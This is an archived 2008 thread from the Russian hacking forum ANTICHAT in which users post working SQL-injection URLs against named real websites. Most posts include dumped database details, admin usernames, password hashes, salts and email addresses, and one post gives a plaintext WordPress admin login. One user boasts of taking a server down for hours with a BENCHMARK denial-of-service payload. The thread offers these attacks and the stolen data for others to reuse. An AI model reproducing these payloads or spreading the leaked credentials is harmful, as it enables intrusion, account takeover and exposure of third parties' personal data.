ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.02.2008, 17:43
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме:
37581
Репутация:
15
|
|
http://www.c-ib.ru/content.php?txt=-7%20union%20select%201,2,version(),user()/*
|
|
|
08.02.2008, 19:09
|
|
Новичок
Регистрация: 27.03.2007
Сообщений: 10
Провел на форуме:
125548
Репутация:
13
|
|
Уязвяшки:
Код:
http://www.redglobe.de/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
Redaktion:d0d67fa9e0a04b037ad308c952ac0f19:2oXYS0T ysfDNgY1O
Bayern:157a8efa7606d16829d690677b9f7e73:hFN6dzgN7m w528lX
Komsomolze:e0b6b71e0f20a8d562fa04d1858298c5:YooDNS KSxbF7nLNf
Sirdon:c1f95d2d9f01c205776d9e4756ee1401
Vera:285a81de436e1b964fe95255e48c76ea
----------------------------
Код:
http://www.gsv1.de/gsv_joomla/index.php?option=com_ynews&Itemid=1&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password),null,5,6+from+jos_users/*
admin:8c30df2b67d3120cb38725b59a8a12b0:FTwfwq9zdpC oVVaRvxxO4h6PKIAD0AY7 |
|
|
|
08.02.2008, 22:13
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
masarykovazs.eu
Код:
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11/*
masarykovazs.eu@localhost:5.0.38-Debian_1-log:masarykovazs_eu
Код:
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11+from+info rmation_schema.tables/*
Код:
http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11+from+inf ormation_schema.columns/*
visit-palawan.com
Код:
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(USER (),0x3a,VERSION(),0x3a,DATABASE())/*
Код:
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(tabl e_name)+from+information_schema.tables/*
Код:
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,column_name +from+information_schema.columns/*
sitedefteri.com
Код:
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DAT ABASE()),5,6,7,8,9,10,11,12,13,14,15/*
root@localhost:5.0.32-Debian_7etch3-log:linkdefteri
Код:
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,1 5+from+information_schema.tables/*
Код:
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,column_name,5,6,7,8,9,10,11,12,13,14, 15+from+information_schema.columns/*
toy-icti.org
Код:
http://www.toy-icti.org/newsletter/index.php?NID=299999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a ,DATABASE()),3/*
seekwell@localhost:4.0.22-Max:SWicti-06
|
|
|
|
08.02.2008, 22:23
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.rooid.ru/index.php?action=staties&id=-9+union+select+1,2,concat_ws(0x3a,username,user_pa ssword),4,5,6,7+from+phpbb_users/*
5.0.32-Debian_7etch5-log
Админы форума:
Admin:6689263e6df1fbd89377d1dac02f87b0 :125040
Stan:0057f84026c20b2a4cdeaf15824773bb: arowana
-----------------------------------------------------
http://www.eurohold.bg/presscenter.php?page=news&id=-286+union+select+1,concat_ws(0x3a,username,passwor d,status),3,4,5,6+from+administrators+limit+0,1/*
5.0.45-log
admin:5569aeb9a91a05eac4bb0186116e44c7
|
|
|
|
09.02.2008, 01:22
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Сообщение от NilsonUA
http://www4.army.mil/otf/story.php?id=-56%20UNION%20SELECT%201,2,concat_ws(0x3,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6+FROM+users/*
Дальше раскрыть не удалось...
энто боян,попробуй найти инъекцию на другом сайте в домене .mil  
|
|
|
|
09.02.2008, 13:31
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
http://www.cristianos.com/wp-content/plugins/wp-cal/functions/editevent.php?%20id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),%203,4,5,6%20from%20wp_user s--
arimel:88589699a8524d14a7fafc60a18f7644:arimel@gma il.com
Путь к админке http://www.cristianos.com/wp-login.php
login arimel
pass anika@99
Кажется прально все оформил) просто первый раз в этом разделе) так что не пинайте  , если что скажите исправлюсь ; )
|
|
|
|
09.02.2008, 13:46
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
Код HTML:
http://kaleydoskop.com.ua/index.php?plugin=katalog&do=showUserContent&type=firms&id=index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*
11::administrator::070670bb5da95b97f378e4b1a5a954d a::info@natalie-lamotte.com
Код HTML:
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
12::admin::670266c7724d26d023f1326f1020e919::eduar d.rapoport@pak-era.com
11::administrator::670266c7724d26d023f1326fb070c1d 0::admin@sahm.com.ua |
|
|
|
09.02.2008, 21:21
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
порция скулей
activision2007.es (сайт испаского Activision)
Код:
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,convert(concat(version(),0x3a,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
version() 4.1.18-nt 
user() DBActivision27@localhost
database() gestion
табла usuario ~75000 юзеров!!! (узнал лимитом)
с трудом нашел колонки id, nombre, email......
Код:
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,3,convert(concat(id,0x3a,nombre,0x3a,email),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+usuario+limit+0,100000
колонку с пассами мне не удалось найти=// так что пробуйте
p.s.потом я разозлился и отправил сервер bеnchmаrk'ом в глубокий DoS/ (часов 5 уже не работает)
ardana.ru
Код:
http://www.ardana.ru/products/product.php?gid=-1+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
version() 4.1.22-standard
user() ardana_ardana@localhost
database() ardana_ardana
otvet.su
Код:
http://www.otvet.su/tovar.php?gid=999999+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() 5.0.24-standard
user() otvet1@localhost
database() db_otvet1
abandoneer.com
Код:
http://abandoneer.com/games.php?gameid=99999999/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() 4.1.21-log
user() evilrafael@localhost
database() evilrafael
|
|
|
|
10.02.2008, 00:39
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Код:
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11users%20id::login::pwd::email
4.1.20::sahm_user1@localhost::sahm_db
Код:
http://www.dharmahealing.org/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
supercristal:bdbfdaa664e59fd3f2ef5a51f0688e10
Код:
http://sacredaeon.com/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null,null,null,null,null/**/from/**/mos_users/*
supercristal:e5fe262def0b72b051d9d11301cde9b9
Код:
http://www.torcidaforcajovem.net/index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
admin:a1c3c4ff7c9a2064f788db3eb8a5fb49
Код:
http://www.xcsport.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
b983:6e321306ec723a50ee62d01f21638bb2f72e4592
Код:
http://www.rusquilt.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
7ae1:3dc58f7e1db2d269fadf0f519315f264db969552
Терь второй раз попробуем, если хэши расшифрованными кидать тогда виноват, просто уже тут видел, что выложивали не расшифрованным (конечно я пробывал рсшифровать), еще раз попрошу чтоб не пинали если че не так) исправлюсь)
Последний раз редактировалось CaNNabi$; 10.02.2008 в 01:47..
Причина: 2 .ru добавил)
|
|
|
|
10.02.2008, 03:55
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от nex0
activision2007.es (сайт испаского Activision)
Код:
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,convert(concat(version(),0x3a,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
Эм... А почему именно конвертом ?(проверить хотел).Серв кстати уже живой:РР.
http://www.activision2007.es/juego.php?jid=-125+BENCHMARK(10000000,BENCHMARK(10000000,md5(curr ent_date)))/* (Не получилось :Р).
P.S. Чесн не знаю,куда постить =____=.Напостил сюда,ибо адресовано аффтару=_______=
Последний раз редактировалось Велемир; 10.02.2008 в 04:11..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
